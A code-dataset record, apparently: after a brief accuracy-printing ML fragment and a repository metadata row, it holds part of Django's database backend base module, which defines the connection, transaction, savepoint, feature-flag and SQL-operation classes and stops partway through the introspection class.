for k, v in algo.items():
model = v
model.fit(X_train, y_train)
print('Acurracy of ' + k + ' is {0:.2f}'.format(model.score(X_test, y_test)*100))
| 17.505882 | 189 | 0.650034 |
c5f650d5037432ec5ef77039c7d48e2ef47367d3 | 51,601 | py | Python | django/db/backends/__init__.py | anoopksh/django | f00243f36df8dfe504491e03be5d5aea076340b3 | [
"BSD-3-Clause"
] | 1 | 2019-09-21T06:40:37.000Z | 2019-09-21T06:40:37.000Z | django/db/backends/__init__.py | anoopksh/django | f00243f36df8dfe504491e03be5d5aea076340b3 | [
"BSD-3-Clause"
] | null | null | null | django/db/backends/__init__.py | anoopksh/django | f00243f36df8dfe504491e03be5d5aea076340b3 | [
"BSD-3-Clause"
] | null | null | null | import datetime
import time
try:
from django.utils.six.moves import _thread as thread
except ImportError:
from django.utils.six.moves import _dummy_thread as thread
from collections import namedtuple
from contextlib import contextmanager
from importlib import import_module
from django.conf import settings
from django.db import DEFAULT_DB_ALIAS
from django.db.backends.signals import connection_created
from django.db.backends import utils
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, DatabaseErrorWrapper, ProgrammingError
from django.utils.functional import cached_property
from django.utils import six
from django.utils import timezone
class BaseDatabaseWrapper(object):
"""
Represents a database connection.
"""
ops = None
vendor = 'unknown'
def __init__(self, settings_dict, alias=DEFAULT_DB_ALIAS,
allow_thread_sharing=False):
# `settings_dict` should be a dictionary containing keys such as
# NAME, USER, etc. It's called `settings_dict` instead of `settings`
# to disambiguate it from Django settings modules.
self.connection = None
self.queries = []
self.settings_dict = settings_dict
self.alias = alias
self.use_debug_cursor = None
# Savepoint management related attributes
self.savepoint_state = 0
# Transaction management related attributes
self.autocommit = False
self.transaction_state = []
# Tracks if the connection is believed to be in transaction. This is
# set somewhat aggressively, as the DBAPI doesn't make it easy to
# deduce if the connection is in transaction or not.
self._dirty = False
# Tracks if the connection is in a transaction managed by 'atomic'.
self.in_atomic_block = False
# List of savepoints created by 'atomic'
self.savepoint_ids = []
# Tracks if the outermost 'atomic' block should commit on exit,
# ie. if autocommit was active on entry.
self.commit_on_exit = True
# Tracks if the transaction should be rolled back to the next
# available savepoint because of an exception in an inner block.
self.needs_rollback = False
# Connection termination related attributes
self.close_at = None
self.errors_occurred = False
# Thread-safety related attributes
self.allow_thread_sharing = allow_thread_sharing
self._thread_ident = thread.get_ident()
def __eq__(self, other):
if isinstance(other, BaseDatabaseWrapper):
return self.alias == other.alias
return NotImplemented
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.alias)
##### Backend-specific methods for creating connections and cursors #####
def get_connection_params(self):
"""Returns a dict of parameters suitable for get_new_connection."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_connection_params() method')
def get_new_connection(self, conn_params):
"""Opens a connection to the database."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_new_connection() method')
def init_connection_state(self):
"""Initializes the database connection settings."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require an init_connection_state() method')
def create_cursor(self):
"""Creates a cursor. Assumes that a connection is established."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a create_cursor() method')
##### Backend-specific methods for creating connections #####
def connect(self):
"""Connects to the database. Assumes that the connection is closed."""
# In case the previous connection was closed while in an atomic block
self.in_atomic_block = False
self.savepoint_ids = []
# Reset parameters defining when to close the connection
max_age = self.settings_dict['CONN_MAX_AGE']
self.close_at = None if max_age is None else time.time() + max_age
self.errors_occurred = False
# Establish the connection
conn_params = self.get_connection_params()
self.connection = self.get_new_connection(conn_params)
self.init_connection_state()
if self.settings_dict['AUTOCOMMIT']:
self.set_autocommit(True)
connection_created.send(sender=self.__class__, connection=self)
def ensure_connection(self):
"""
Guarantees that a connection to the database is established.
"""
if self.connection is None:
with self.wrap_database_errors:
self.connect()
##### Backend-specific wrappers for PEP-249 connection methods #####
def _cursor(self):
self.ensure_connection()
with self.wrap_database_errors:
return self.create_cursor()
def _commit(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.commit()
def _rollback(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.rollback()
def _close(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.close()
##### Generic wrappers for PEP-249 connection methods #####
def cursor(self):
"""
Creates a cursor, opening a connection if necessary.
"""
self.validate_thread_sharing()
if (self.use_debug_cursor or
(self.use_debug_cursor is None and settings.DEBUG)):
cursor = self.make_debug_cursor(self._cursor())
else:
cursor = utils.CursorWrapper(self._cursor(), self)
return cursor
def commit(self):
"""
Commits a transaction and resets the dirty flag.
"""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._commit()
self.set_clean()
def rollback(self):
"""
Rolls back a transaction and resets the dirty flag.
"""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._rollback()
self.set_clean()
def close(self):
"""
Closes the connection to the database.
"""
self.validate_thread_sharing()
# Don't call validate_no_atomic_block() to avoid making it difficult
# to get rid of a connection in an invalid state. The next connect()
# will reset the transaction state anyway.
try:
self._close()
finally:
self.connection = None
self.set_clean()
##### Backend-specific savepoint management methods #####
def _savepoint(self, sid):
self.cursor().execute(self.ops.savepoint_create_sql(sid))
def _savepoint_rollback(self, sid):
self.cursor().execute(self.ops.savepoint_rollback_sql(sid))
def _savepoint_commit(self, sid):
self.cursor().execute(self.ops.savepoint_commit_sql(sid))
def _savepoint_allowed(self):
# Savepoints cannot be created outside a transaction
return self.features.uses_savepoints and not self.get_autocommit()
##### Generic savepoint management methods #####
def savepoint(self):
"""
Creates a savepoint inside the current transaction. Returns an
identifier for the savepoint that will be used for the subsequent
rollback or commit. Does nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
thread_ident = thread.get_ident()
tid = str(thread_ident).replace('-', '')
self.savepoint_state += 1
sid = "s%s_x%d" % (tid, self.savepoint_state)
self.validate_thread_sharing()
self._savepoint(sid)
return sid
def savepoint_rollback(self, sid):
"""
Rolls back to a savepoint. Does nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_rollback(sid)
def savepoint_commit(self, sid):
"""
Releases a savepoint. Does nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_commit(sid)
def clean_savepoints(self):
"""
Resets the counter used to generate unique savepoint ids in this thread.
"""
self.savepoint_state = 0
##### Backend-specific transaction management methods #####
def _set_autocommit(self, autocommit):
"""
Backend-specific implementation to enable or disable autocommit.
"""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a _set_autocommit() method')
##### Generic transaction management methods #####
def enter_transaction_management(self, managed=True, forced=False):
"""
Enters transaction management for a running thread. It must be balanced with
the appropriate leave_transaction_management call, since the actual state is
managed as a stack.
The state and dirty flag are carried over from the surrounding block or
from the settings, if there is no surrounding block (dirty is always false
when no current block is running).
If you switch off transaction management and there is a pending
commit/rollback, the data will be commited, unless "forced" is True.
"""
self.validate_no_atomic_block()
self.transaction_state.append(managed)
if not managed and self.is_dirty() and not forced:
self.commit()
self.set_clean()
if managed == self.get_autocommit():
self.set_autocommit(not managed)
def leave_transaction_management(self):
"""
Leaves transaction management for a running thread. A dirty flag is carried
over to the surrounding block, as a commit will commit all changes, even
those from outside. (Commits are on connection level.)
"""
self.validate_no_atomic_block()
if self.transaction_state:
del self.transaction_state[-1]
else:
raise TransactionManagementError(
"This code isn't under transaction management")
if self.transaction_state:
managed = self.transaction_state[-1]
else:
managed = not self.settings_dict['AUTOCOMMIT']
if self._dirty:
self.rollback()
if managed == self.get_autocommit():
self.set_autocommit(not managed)
raise TransactionManagementError(
"Transaction managed block ended with pending COMMIT/ROLLBACK")
if managed == self.get_autocommit():
self.set_autocommit(not managed)
def get_autocommit(self):
"""
Check the autocommit state.
"""
self.ensure_connection()
return self.autocommit
def set_autocommit(self, autocommit):
"""
Enable or disable autocommit.
"""
self.validate_no_atomic_block()
self.ensure_connection()
self._set_autocommit(autocommit)
self.autocommit = autocommit
def get_rollback(self):
"""
Get the "needs rollback" flag -- for *advanced use* only.
"""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
return self.needs_rollback
def set_rollback(self, rollback):
"""
Set or unset the "needs rollback" flag -- for *advanced use* only.
"""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
self.needs_rollback = rollback
def validate_no_atomic_block(self):
"""
Raise an error if an atomic block is active.
"""
if self.in_atomic_block:
raise TransactionManagementError(
"This is forbidden when an 'atomic' block is active.")
def validate_no_broken_transaction(self):
if self.needs_rollback:
raise TransactionManagementError(
"An error occurred in the current transaction. You can't "
"execute queries until the end of the 'atomic' block.")
def abort(self):
"""
Roll back any ongoing transaction and clean the transaction state
stack.
"""
if self._dirty:
self.rollback()
while self.transaction_state:
self.leave_transaction_management()
def is_dirty(self):
"""
Returns True if the current transaction requires a commit for changes to
happen.
"""
return self._dirty
def set_dirty(self):
"""
Sets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether there are open
changes waiting for commit.
"""
if not self.get_autocommit():
self._dirty = True
def set_clean(self):
"""
Resets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether a commit or rollback
should happen.
"""
self._dirty = False
self.clean_savepoints()
##### Foreign key constraints checks handling #####
@contextmanager
def constraint_checks_disabled(self):
"""
Context manager that disables foreign key constraint checking.
"""
disabled = self.disable_constraint_checking()
try:
yield
finally:
if disabled:
self.enable_constraint_checking()
def disable_constraint_checking(self):
"""
Backends can implement as needed to temporarily disable foreign key
constraint checking. Should return True if the constraints were
disabled and will need to be reenabled.
"""
return False
def enable_constraint_checking(self):
"""
Backends can implement as needed to re-enable foreign key constraint
checking.
"""
pass
def check_constraints(self, table_names=None):
"""
Backends can override this method if they can apply constraint
checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE"). Should raise an
IntegrityError if any invalid foreign key references are encountered.
"""
pass
##### Connection termination handling #####
def is_usable(self):
"""
Tests if the database connection is usable.
This function may assume that self.connection is not None.
"""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require an is_usable() method')
def close_if_unusable_or_obsolete(self):
"""
Closes the current connection if unrecoverable errors have occurred,
or if it outlived its maximum age.
"""
if self.connection is not None:
# If the application didn't restore the original autocommit setting,
# don't take chances, drop the connection.
if self.get_autocommit() != self.settings_dict['AUTOCOMMIT']:
self.close()
return
if self.errors_occurred:
if self.is_usable():
self.errors_occurred = False
else:
self.close()
return
if self.close_at is not None and time.time() >= self.close_at:
self.close()
return
##### Thread safety handling #####
def validate_thread_sharing(self):
"""
Validates that the connection isn't accessed by another thread than the
one which originally created it, unless the connection was explicitly
authorized to be shared between threads (via the `allow_thread_sharing`
property). Raises an exception if the validation fails.
"""
if not (self.allow_thread_sharing
or self._thread_ident == thread.get_ident()):
raise DatabaseError("DatabaseWrapper objects created in a "
"thread can only be used in that same thread. The object "
"with alias '%s' was created in thread id %s and this is "
"thread id %s."
% (self.alias, self._thread_ident, thread.get_ident()))
##### Miscellaneous #####
@cached_property
def wrap_database_errors(self):
"""
Context manager and decorator that re-throws backend-specific database
exceptions using Django's common wrappers.
"""
return DatabaseErrorWrapper(self)
def make_debug_cursor(self, cursor):
"""
Creates a cursor that logs all queries in self.queries.
"""
return utils.CursorDebugWrapper(cursor, self)
@contextmanager
def temporary_connection(self):
"""
Context manager that ensures that a connection is established, and
if it opened one, closes it to avoid leaving a dangling connection.
This is useful for operations outside of the request-response cycle.
Provides a cursor: with self.temporary_connection() as cursor: ...
"""
must_close = self.connection is None
cursor = self.cursor()
try:
yield cursor
finally:
cursor.close()
if must_close:
self.close()
def _start_transaction_under_autocommit(self):
"""
Only required when autocommits_when_autocommit_is_off = True.
"""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a _start_transaction_under_autocommit() method')
def schema_editor(self, *args, **kwargs):
"Returns a new instance of this backend's SchemaEditor"
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a schema_editor() method')
class BaseDatabaseFeatures(object):
allows_group_by_pk = False
# True if django.db.backend.utils.typecast_timestamp is used on values
# returned from dates() calls.
needs_datetime_string_cast = True
empty_fetchmany_value = []
update_can_self_select = True
# Does the backend distinguish between '' and None?
interprets_empty_strings_as_nulls = False
# Does the backend allow inserting duplicate rows when a unique_together
# constraint exists, but one of the unique_together columns is NULL?
ignores_nulls_in_unique_constraints = True
can_use_chunked_reads = True
can_return_id_from_insert = False
has_bulk_insert = False
uses_savepoints = False
can_combine_inserts_with_and_without_auto_increment_pk = False
# If True, don't use integer foreign keys referring to, e.g., positive
# integer primary keys.
related_fields_match_type = False
allow_sliced_subqueries = True
has_select_for_update = False
has_select_for_update_nowait = False
supports_select_related = True
# Does the default test database allow multiple connections?
# Usually an indication that the test database is in-memory
test_db_allows_multiple_connections = True
# Can an object be saved without an explicit primary key?
supports_unspecified_pk = False
# Can a fixture contain forward references? i.e., are
# FK constraints checked at the end of transaction, or
# at the end of each save operation?
supports_forward_references = True
# Does a dirty transaction need to be rolled back
# before the cursor can be used again?
requires_rollback_on_dirty_transaction = False
# Does the backend allow very long model names without error?
supports_long_model_names = True
# Is there a REAL datatype in addition to floats/doubles?
has_real_datatype = False
supports_subqueries_in_group_by = True
supports_bitwise_or = True
# Do time/datetime fields have microsecond precision?
supports_microsecond_precision = True
# Does the __regex lookup support backreferencing and grouping?
supports_regex_backreferencing = True
# Can date/datetime lookups be performed using a string?
supports_date_lookup_using_string = True
# Can datetimes with timezones be used?
supports_timezones = True
# Does the database have a copy of the zoneinfo database?
has_zoneinfo_database = True
# When performing a GROUP BY, is an ORDER BY NULL required
# to remove any ordering?
requires_explicit_null_ordering_when_grouping = False
# Does the backend order NULL values as largest or smallest?
nulls_order_largest = False
# Is there a 1000 item limit on query parameters?
supports_1000_query_parameters = True
# Can an object have a primary key of 0? MySQL says No.
allows_primary_key_0 = True
# Do we need to NULL a ForeignKey out, or can the constraint check be
# deferred
can_defer_constraint_checks = False
# date_interval_sql can properly handle mixed Date/DateTime fields and timedeltas
supports_mixed_date_datetime_comparisons = True
# Does the backend support tablespaces? Default to False because it isn't
# in the SQL standard.
supports_tablespaces = False
# Does the backend reset sequences between tests?
supports_sequence_reset = True
# Confirm support for introspected foreign keys
# Every database can do this reliably, except MySQL,
# which can't do it for MyISAM tables
can_introspect_foreign_keys = True
# Can the backend introspect an AutoField, instead of an IntegerField?
can_introspect_autofield = False
# Support for the DISTINCT ON clause
can_distinct_on_fields = False
# Does the backend decide to commit before SAVEPOINT statements
# when autocommit is disabled? http://bugs.python.org/issue8145#msg109965
autocommits_when_autocommit_is_off = False
# Does the backend prevent running SQL queries in broken transactions?
atomic_transactions = True
# Can we roll back DDL in a transaction?
can_rollback_ddl = False
# Can we issue more than one ALTER COLUMN clause in an ALTER TABLE?
supports_combined_alters = False
# What's the maximum length for index names?
max_index_name_length = 63
# Does it support foreign keys?
supports_foreign_keys = True
# Does it support CHECK constraints?
supports_check_constraints = True
# Does the backend support 'pyformat' style ("... %(name)s ...", {'name': value})
# parameter passing? Note this can be provided by the backend even if not
# supported by the Python driver
supports_paramstyle_pyformat = True
# Does the backend require literal defaults, rather than parameterised ones?
requires_literal_defaults = False
# Does the backend require a connection reset after each material schema change?
connection_persists_old_columns = False
# What kind of error does the backend throw when accessing closed cursor?
closed_cursor_error_class = ProgrammingError
def __init__(self, connection):
self.connection = connection
@cached_property
def supports_transactions(self):
"Confirm support for transactions"
try:
# Make sure to run inside a managed transaction block,
# otherwise autocommit will cause the confimation to
# fail.
self.connection.enter_transaction_management()
cursor = self.connection.cursor()
cursor.execute('CREATE TABLE ROLLBACK_TEST (X INT)')
self.connection.commit()
cursor.execute('INSERT INTO ROLLBACK_TEST (X) VALUES (8)')
self.connection.rollback()
cursor.execute('SELECT COUNT(X) FROM ROLLBACK_TEST')
count, = cursor.fetchone()
cursor.execute('DROP TABLE ROLLBACK_TEST')
self.connection.commit()
finally:
self.connection.leave_transaction_management()
return count == 0
@cached_property
def supports_stddev(self):
"Confirm support for STDDEV and related stats functions"
class StdDevPop(object):
sql_function = 'STDDEV_POP'
try:
self.connection.ops.check_aggregate_support(StdDevPop())
return True
except NotImplementedError:
return False
class BaseDatabaseOperations(object):
"""
This class encapsulates all backend-specific differences, such as the way
a backend performs ordering or calculates the ID of a recently-inserted
row.
"""
compiler_module = "django.db.models.sql.compiler"
def __init__(self, connection):
self.connection = connection
self._cache = None
def autoinc_sql(self, table, column):
"""
Returns any SQL needed to support auto-incrementing primary keys, or
None if no SQL is necessary.
This SQL is executed when a table is created.
"""
return None
def bulk_batch_size(self, fields, objs):
"""
Returns the maximum allowed batch size for the backend. The fields
are the fields going to be inserted in the batch, the objs contains
all the objects to be inserted.
"""
return len(objs)
def cache_key_culling_sql(self):
"""
Returns an SQL query that retrieves the first cache key greater than the
n smallest.
This is used by the 'db' cache backend to determine where to start
culling.
"""
return "SELECT cache_key FROM %s ORDER BY cache_key LIMIT 1 OFFSET %%s"
def date_extract_sql(self, lookup_type, field_name):
"""
Given a lookup_type of 'year', 'month' or 'day', returns the SQL that
extracts a value from the given date field field_name.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a date_extract_sql() method')
def date_interval_sql(self, sql, connector, timedelta):
"""
Implements the date interval functionality for expressions
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a date_interval_sql() method')
def date_trunc_sql(self, lookup_type, field_name):
"""
Given a lookup_type of 'year', 'month' or 'day', returns the SQL that
truncates the given date field field_name to a date object with only
the given specificity.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a datetrunc_sql() method')
def datetime_cast_sql(self):
"""
Returns the SQL necessary to cast a datetime value so that it will be
retrieved as a Python datetime object instead of a string.
This SQL should include a '%s' in place of the field's name.
"""
return "%s"
def datetime_extract_sql(self, lookup_type, field_name, tzname):
"""
Given a lookup_type of 'year', 'month', 'day', 'hour', 'minute' or
'second', returns the SQL that extracts a value from the given
datetime field field_name, and a tuple of parameters.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a datetime_extract_sql() method')
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
"""
Given a lookup_type of 'year', 'month', 'day', 'hour', 'minute' or
'second', returns the SQL that truncates the given datetime field
field_name to a datetime object with only the given specificity, and
a tuple of parameters.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a datetime_trunk_sql() method')
def deferrable_sql(self):
"""
Returns the SQL necessary to make a constraint "initially deferred"
during a CREATE TABLE statement.
"""
return ''
def distinct_sql(self, fields):
"""
Returns an SQL DISTINCT clause which removes duplicate rows from the
result set. If any fields are given, only the given fields are being
checked for duplicates.
"""
if fields:
raise NotImplementedError('DISTINCT ON fields is not supported by this database backend')
else:
return 'DISTINCT'
def drop_foreignkey_sql(self):
"""
Returns the SQL command that drops a foreign key.
"""
return "DROP CONSTRAINT"
def drop_sequence_sql(self, table):
"""
Returns any SQL necessary to drop the sequence for the given table.
Returns None if no SQL is necessary.
"""
return None
def fetch_returned_insert_id(self, cursor):
"""
Given a cursor object that has just performed an INSERT...RETURNING
statement into a table that has an auto-incrementing ID, returns the
newly created ID.
"""
return cursor.fetchone()[0]
def field_cast_sql(self, db_type, internal_type):
"""
Given a column type (e.g. 'BLOB', 'VARCHAR'), and an internal type
(e.g. 'GenericIPAddressField'), returns the SQL necessary to cast it
before using it in a WHERE statement. Note that the resulting string
should contain a '%s' placeholder for the column being searched against.
"""
return '%s'
def force_no_ordering(self):
"""
Returns a list used in the "ORDER BY" clause to force no ordering at
all. Returning an empty list means that nothing will be included in the
ordering.
"""
return []
def for_update_sql(self, nowait=False):
"""
Returns the FOR UPDATE SQL clause to lock rows for an update operation.
"""
if nowait:
return 'FOR UPDATE NOWAIT'
else:
return 'FOR UPDATE'
def fulltext_search_sql(self, field_name):
"""
Returns the SQL WHERE clause to use in order to perform a full-text
search of the given field_name. Note that the resulting string should
contain a '%s' placeholder for the value being searched against.
"""
raise NotImplementedError('Full-text search is not implemented for this database backend')
def last_executed_query(self, cursor, sql, params):
"""
Returns a string of the query last executed by the given cursor, with
placeholders replaced with actual values.
`sql` is the raw query containing placeholders, and `params` is the
sequence of parameters. These are used by default, but this method
exists for database backends to provide a better implementation
according to their own quoting schemes.
"""
from django.utils.encoding import force_text
# Convert params to contain Unicode values.
to_unicode = lambda s: force_text(s, strings_only=True, errors='replace')
if isinstance(params, (list, tuple)):
u_params = tuple(to_unicode(val) for val in params)
elif params is None:
u_params = ()
else:
u_params = dict((to_unicode(k), to_unicode(v)) for k, v in params.items())
return six.text_type("QUERY = %r - PARAMS = %r") % (sql, u_params)
def last_insert_id(self, cursor, table_name, pk_name):
"""
Given a cursor object that has just performed an INSERT statement into
a table that has an auto-incrementing ID, returns the newly created ID.
This method also receives the table name and the name of the primary-key
column.
"""
return cursor.lastrowid
def lookup_cast(self, lookup_type):
"""
Returns the string to use in a query when performing lookups
("contains", "like", etc). The resulting string should contain a '%s'
placeholder for the column being searched against.
"""
return "%s"
def max_in_list_size(self):
"""
Returns the maximum number of items that can be passed in a single 'IN'
list condition, or None if the backend does not impose a limit.
"""
return None
def max_name_length(self):
"""
Returns the maximum length of table and column names, or None if there
is no limit.
"""
return None
def no_limit_value(self):
"""
Returns the value to use for the LIMIT when we are wanting "LIMIT
infinity". Returns None if the limit clause can be omitted in this case.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a no_limit_value() method')
def pk_default_value(self):
"""
Returns the value to use during an INSERT statement to specify that
the field should use its default value.
"""
return 'DEFAULT'
def process_clob(self, value):
"""
Returns the value of a CLOB column, for backends that return a locator
object that requires additional processing.
"""
return value
def return_insert_id(self):
"""
For backends that support returning the last insert ID as part
of an insert query, this method returns the SQL and params to
append to the INSERT query. The returned fragment should
contain a format string to hold the appropriate column.
"""
pass
def compiler(self, compiler_name):
"""
Returns the SQLCompiler class corresponding to the given name,
in the namespace corresponding to the `compiler_module` attribute
on this backend.
"""
if self._cache is None:
self._cache = import_module(self.compiler_module)
return getattr(self._cache, compiler_name)
def quote_name(self, name):
"""
Returns a quoted version of the given table, index or column name. Does
not quote the given name if it's already been quoted.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a quote_name() method')
def quote_parameter(self, value):
"""
Returns a quoted version of the value so it's safe to use in an SQL
string. This should NOT be used to prepare SQL statements to send to
the database; it is meant for outputting SQL statements to a file
or the console for later execution by a developer/DBA.
"""
raise NotImplementedError()
def random_function_sql(self):
"""
Returns an SQL expression that returns a random value.
"""
return 'RANDOM()'
def regex_lookup(self, lookup_type):
"""
Returns the string to use in a query when performing regular expression
lookups (using "regex" or "iregex"). The resulting string should
contain a '%s' placeholder for the column being searched against.
If the feature is not supported (or part of it is not supported), a
NotImplementedError exception can be raised.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a regex_lookup() method')
def savepoint_create_sql(self, sid):
"""
Returns the SQL for starting a new savepoint. Only required if the
"uses_savepoints" feature is True. The "sid" parameter is a string
for the savepoint id.
"""
return "SAVEPOINT %s" % self.quote_name(sid)
def savepoint_commit_sql(self, sid):
"""
Returns the SQL for committing the given savepoint.
"""
return "RELEASE SAVEPOINT %s" % self.quote_name(sid)
def savepoint_rollback_sql(self, sid):
"""
Returns the SQL for rolling back the given savepoint.
"""
return "ROLLBACK TO SAVEPOINT %s" % self.quote_name(sid)
def set_time_zone_sql(self):
"""
Returns the SQL that will set the connection's time zone.
Returns '' if the backend doesn't support time zones.
"""
return ''
def sql_flush(self, style, tables, sequences, allow_cascade=False):
"""
Returns a list of SQL statements required to remove all data from
the given database tables (without actually removing the tables
themselves).
The returned value also includes SQL statements required to reset DB
sequences passed in :param sequences:.
The `style` argument is a Style object as returned by either
color_style() or no_style() in django.core.management.color.
The `allow_cascade` argument determines whether truncation may cascade
to tables with foreign keys pointing the tables being truncated.
PostgreSQL requires a cascade even if these tables are empty.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations must provide a sql_flush() method')
def sequence_reset_by_name_sql(self, style, sequences):
"""
Returns a list of the SQL statements required to reset sequences
passed in :param sequences:.
The `style` argument is a Style object as returned by either
color_style() or no_style() in django.core.management.color.
"""
return []
def sequence_reset_sql(self, style, model_list):
"""
Returns a list of the SQL statements required to reset sequences for
the given models.
The `style` argument is a Style object as returned by either
color_style() or no_style() in django.core.management.color.
"""
return [] # No sequence reset required by default.
def start_transaction_sql(self):
"""
Returns the SQL statement required to start a transaction.
"""
return "BEGIN;"
def end_transaction_sql(self, success=True):
"""
Returns the SQL statement required to end a transaction.
"""
if not success:
return "ROLLBACK;"
return "COMMIT;"
def tablespace_sql(self, tablespace, inline=False):
"""
Returns the SQL that will be used in a query to define the tablespace.
Returns '' if the backend doesn't support tablespaces.
If inline is True, the SQL is appended to a row; otherwise it's appended
to the entire CREATE TABLE or CREATE INDEX statement.
"""
return ''
def prep_for_like_query(self, x):
"""Prepares a value for use in a LIKE query."""
from django.utils.encoding import force_text
return force_text(x).replace("\\", "\\\\").replace("%", "\%").replace("_", "\_")
# Same as prep_for_like_query(), but called for "iexact" matches, which
# need not necessarily be implemented using "LIKE" in the backend.
prep_for_iexact_query = prep_for_like_query
def validate_autopk_value(self, value):
"""
Certain backends do not accept some values for "serial" fields
(for example zero in MySQL). This method will raise a ValueError
if the value is invalid, otherwise returns validated value.
"""
return value
def value_to_db_date(self, value):
"""
Transform a date value to an object compatible with what is expected
by the backend driver for date columns.
"""
if value is None:
return None
return six.text_type(value)
def value_to_db_datetime(self, value):
"""
Transform a datetime value to an object compatible with what is expected
by the backend driver for datetime columns.
"""
if value is None:
return None
return six.text_type(value)
def value_to_db_time(self, value):
"""
Transform a time value to an object compatible with what is expected
by the backend driver for time columns.
"""
if value is None:
return None
if timezone.is_aware(value):
raise ValueError("Django does not support timezone-aware times.")
return six.text_type(value)
def value_to_db_decimal(self, value, max_digits, decimal_places):
"""
Transform a decimal.Decimal value to an object compatible with what is
expected by the backend driver for decimal (numeric) columns.
"""
if value is None:
return None
return utils.format_number(value, max_digits, decimal_places)
def year_lookup_bounds_for_date_field(self, value):
"""
Returns a two-elements list with the lower and upper bound to be used
with a BETWEEN operator to query a DateField value using a year
lookup.
`value` is an int, containing the looked-up year.
"""
first = datetime.date(value, 1, 1)
second = datetime.date(value, 12, 31)
return [first, second]
def year_lookup_bounds_for_datetime_field(self, value):
"""
Returns a two-elements list with the lower and upper bound to be used
with a BETWEEN operator to query a DateTimeField value using a year
lookup.
`value` is an int, containing the looked-up year.
"""
first = datetime.datetime(value, 1, 1)
second = datetime.datetime(value, 12, 31, 23, 59, 59, 999999)
if settings.USE_TZ:
tz = timezone.get_current_timezone()
first = timezone.make_aware(first, tz)
second = timezone.make_aware(second, tz)
return [first, second]
def convert_values(self, value, field):
"""
Coerce the value returned by the database backend into a consistent type
that is compatible with the field type.
"""
if value is None or field is None:
return value
internal_type = field.get_internal_type()
if internal_type == 'FloatField':
return float(value)
elif (internal_type and (internal_type.endswith('IntegerField')
or internal_type == 'AutoField')):
return int(value)
return value
def check_aggregate_support(self, aggregate_func):
"""Check that the backend supports the provided aggregate
This is used on specific backends to rule out known aggregates
that are known to have faulty implementations. If the named
aggregate function has a known problem, the backend should
raise NotImplementedError.
"""
pass
def combine_expression(self, connector, sub_expressions):
"""Combine a list of subexpressions into a single expression, using
the provided connecting operator. This is required because operators
can vary between backends (e.g., Oracle with %% and &) and between
subexpression types (e.g., date expressions)
"""
conn = ' %s ' % connector
return conn.join(sub_expressions)
def modify_insert_params(self, placeholders, params):
"""Allow modification of insert parameters. Needed for Oracle Spatial
backend due to #10888.
"""
return params
# Structure returned by the DB-API cursor.description interface (PEP 249)
FieldInfo = namedtuple('FieldInfo',
'name type_code display_size internal_size precision scale null_ok')
class BaseDatabaseIntrospection(object):
"""
This class encapsulates all backend-specific introspection utilities
"""
data_types_reverse = {}
def __init__(self, connection):
self.connection = connection
def get_field_type(self, data_type, description):
"""Hook for a database backend to use the cursor description to
match a Django field type to a database column.
For Oracle, the column data_type on its own is insufficient to
distinguish between a FloatField and IntegerField, for example."""
return self.data_types_reverse[data_type]
def table_name_converter(self, name):
"""Apply a conversion to the name for the purposes of comparison.
The default table name converter is for case sensitive comparison.
"""
return name
def table_names(self, cursor=None):
"""
Returns a list of names of all tables that exist in the database.
The returned table list is sorted by Python's default sorting. We
do NOT use database's ORDER BY here to avoid subtle differences
in sorting order between databases.
"""
if cursor is None:
cursor = self.connection.cursor()
return sorted(self.get_table_list(cursor))
def get_table_list(self, cursor):
"""
Returns an unsorted list of names of all tables that exist in the
database.
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_table_list() method')
def django_table_names(self, only_existing=False):
"""
Returns a list of all table names that have associated Django models and
are in INSTALLED_APPS.
If only_existing is True, the resulting list will only include the tables
that actually exist in the database.
"""
from django.apps import apps
from django.db import router
tables = set()
for app_config in apps.get_app_configs(only_with_models_module=True):
for model in router.get_migratable_models(app_config.models_module, self.connection.alias):
if not model._meta.managed:
continue
tables.add(model._meta.db_table)
tables.update(f.m2m_db_table() for f in model._meta.local_many_to_many)
tables = list(tables)
if only_existing:
existing_tables = self.table_names()
tables = [
t
for t in tables
if self.table_name_converter(t) in existing_tables
]
return tables
def installed_models(self, tables):
"Returns a set of all models represented by the provided list of table names."
from django.apps import apps
from django.db import router
all_models = []
for app_config in apps.get_app_configs(only_with_models_module=True):
all_models.extend(router.get_migratable_models(app_config.models_module, self.connection.alias))
tables = list(map(self.table_name_converter, tables))
return set([
m for m in all_models
if self.table_name_converter(m._meta.db_table) in tables
])
def sequence_list(self):
"Returns a list of information about all DB sequences for all models in all apps."
from django.apps import apps
from django.db import models, router
